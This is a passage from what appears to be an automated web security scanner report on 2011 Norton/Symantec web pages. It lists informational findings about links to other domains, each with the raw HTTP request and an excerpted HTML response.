<a target="_blank" href='http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0'>Leave Feedback</a>
...[SNIP]...
<li>
<a target="_blank" href='http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272'>License Agreements</a>
...[SNIP]...
<li><a class="footer-link" id="nof" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="nobu" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="nom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="safeweb" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="na" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc">
<span class="footer-tt">
...[SNIP]...
<li><a class="footer-link" id="nortondotcom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc">
<span class="footer-tt">
...[SNIP]...

14.46. http://us.norton.com/beta/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/beta/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/beta/index.jsp?inid=us_hho_homepage_hero4_2012beta

The response contains the following links to other domains:

http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Expires: Fri, 09 Sep 2011 21:47:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:30 GMT
Content-Length: 24280
Connection: close
Set-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.47. http://us.norton.com/beta/overview.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/beta/overview.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta

The response contains the following links to other domains:

http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both
http://twitter.com/norton_beta
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
http://www.twitter.com/norton_beta
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Expires: Fri, 09 Sep 2011 21:47:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39170

<meta http-equiv="refresh" content="0;url=http://us.norton.com/beta">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Beta Software - Norton 360 Version
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<li><a href="http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both" target="_blank">Norton Recovery Tools</a>
...[SNIP]...
<div class="cbMrgnBtmMD">Please follow the <a href="http://www.twitter.com/norton_beta" target="_blank">Norton Public Beta Twitter Account</a>
...[SNIP]...
l support on beta version software products. We do, however, value your feedback on features, usability, and bugs. All information submitted is routed through a secure server and is in compliance with <a href="http://www.symantec.com/about/profile/policies/privacy.jsp" target="_blank">Symantec...s Privacy Policy</a>
...[SNIP]...
<div class="promoWdgt"><a href="http://twitter.com/norton_beta"><img src="/content/en/us/home_homeoffice/images/promos/n-beta10-twitter-promo-b.gif" alt="Follow Norton on Twitter" title="Follow Norton on Twitter" class="imgFltTop " width="180" height="90"/>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.48. http://us.norton.com/norton-utilities/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/norton-utilities/

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage

The response contains the following links to other domains:

http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/norton/products/reviews/index.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/default.do
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=3501
Date: Fri, 09 Sep 2011 21:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83835

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Registry Cleaners - Computer Startup Programs | Norton Utilities</title>
<me
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
</div>


               <a href="http://www.symantec.com/norton/products/reviews/index.jsp" target="_blank">Read more reviews</a>
...[SNIP]...
<li><a href="https://www.mynortonaccount.com/amsweb/default.do">Access Norton Account</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/nortonlive/spyware-virus-removal.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=1406631&t=2
http://bp.specificclick.net/?pixid=99068597
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138499&ns=1
http://dm.demdex.net/pixel/19701
http://marchex.voicestar.com/euinc/number-changer.js
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/repository.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf
http://www.symantec.com/enterprise/contact_sales.jsp
http://www.symantec.com/enterprise/support/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/norton/support/DIY/index.jsp
http://www.symantec.com/norton/support/dtree.jsp?pvid=
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://nortonlive.support.com/
https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3123
Date: Fri, 09 Sep 2011 21:47:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36294

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Virus Removal & Malware Removal Service | NortonLive</title>
<meta http-
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<noscript>
<img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138499&ns=1"/>
</noscript>

<img src="http://dm.demdex.net/pixel/19701" width="0" height="0" />
<IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0" />
<img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" />


...[SNIP]...
<li><a href="https://nortonlive.support.com/" id="myAcctBtn" target="_blank">My Account</a>
...[SNIP]...
<p><a href="http://www.symantec.com/norton/support/dtree.jsp?pvid=" target="_blank">Go To Symantec<br/>
...[SNIP]...
</p>


                   <a href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss" target="_blank" class="replaced" id="chatBtn">Chat With Us</a>
...[SNIP]...
<li><a href="http://www.symantec.com/norton/support/DIY/index.jsp" id="rsrc2" target="_blank">DIY Resources</a>
...[SNIP]...
<td>Each NortonLive Service is subject to acceptance of Symantec’s <a href="http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank">NortonLive Services Terms & Conditions</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements">License Agreements</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository">Repository</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support">Business Support</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales">Business Sales</a>
...[SNIP]...
<li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information">Corporate Information</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js">
   </script>
...[SNIP]...

14.50. http://us.norton.com/products/charts/comparison.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/products/charts/comparison.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/products/charts/comparison.jsp?pcid=mp

The response contains the following links to other domains:

http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /products/charts/comparison.jsp?pcid=mp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1366
Date: Fri, 09 Sep 2011 21:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 73931

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Computer Security Systems | Compare Norton Products</title>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
subscription to receive virus protection and scanning engine updates. Use of this product is subject to acceptance of the Symantec License Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp">here</a>
...[SNIP]...
eatures may be added, modified, or removed during the service period. Use of each product is subject to acceptance of the Symantec LLicense Agreement included with the product and available for review <a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp">here</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.51. http://us.norton.com/support/DIY/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/support/DIY/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=1406631&t=2
http://bp.specificclick.net/?pixid=99068597
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138512&ns=1
http://dm.demdex.net/pixel/19701
http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/repository.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf
http://www.symantec.com/enterprise/contact_sales.jsp
http://www.symantec.com/enterprise/support/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /support/DIY/index.jsp?inid=us_hho_support_tovnav2_removaltools HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3436
Date: Fri, 09 Sep 2011 21:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35700

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Free Virus Removal | Norton Power Eraser</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<noscript>
   <img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138512&ns=1"/>
</noscript>

<img src="http://dm.demdex.net/pixel/19701" width="0" height="0" />
<IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0">
<IMG SRC="http://bp.specificclick.net?pixid=99068597" width="1" height="1" border="0">
<img src="http://ads.bluelithium.com/pixel?id=1406631&t=2" width="1" height="1" />
</div>
...[SNIP]...
<div id="solution_button">
                       <a class="button" id="download_button" onclick="javascript:trackOmnitureEvent(this, 'download_solution')"
                        href="http://liveupdate.symantec.com/upgrade/NPE/1033/NPE.exe" >
                           <span>
...[SNIP]...
<div id="chat_button">
<a class="button" href="https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss-diy" target="_blank" id="vss_chat" onclick="javascript:trackOmnitureEvent(this, 'vss_chat_link')">
<span>
...[SNIP]...
<div id="terms_conditions">
           <a href = "http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf" target="_blank" id="ps_terms_conditions"
            onclick="javascript:trackOmnitureEvent(this, 'ps_terms_conditions')">
               <div class="orangearrow">
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements">License Agreements</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository">Repository</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support">Business Support</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales">Business Sales</a>
...[SNIP]...
<li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information">Corporate Information</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.52. http://us.norton.com/support/dtree.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/support/dtree.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://us.norton.com/support/dtree.jsp?pvid=

The response contains the following links to other domains:

http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/repository.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/enterprise/contact_sales.jsp
http://www.symantec.com/enterprise/support/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN

Request

GET /support/dtree.jsp?pvid= HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-Java-System-Web-Server/7.0
Location: https://www-secure.symantec.com/norton-support/index.jsp?&lg=english&ct=united+states&product=home&version=1&pvid=f-home&entsrc=redirect_pubweb
Content-Type: text/html;charset=utf-8
Content-Length: 38842
Vary: Accept-Encoding
Cache-Control: public, max-age=2709
Date: Fri, 09 Sep 2011 21:47:15 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Product Support ... Technical Issues | Order Status | Rebates | Norton Support</title>
<meta http-equiv="Con
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<div class ="quicklink_item">
<a href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN" target="_blank" onclick="javascript:trackCustomLink(this, 'order_status')">
<img src="/content/en/us/home_homeoffice/images/support/ver1/dtree/button_orderStatus.png" border="0" height="43" width="40" />
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements">License Agreements</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository">Repository</a>
...[SNIP]...
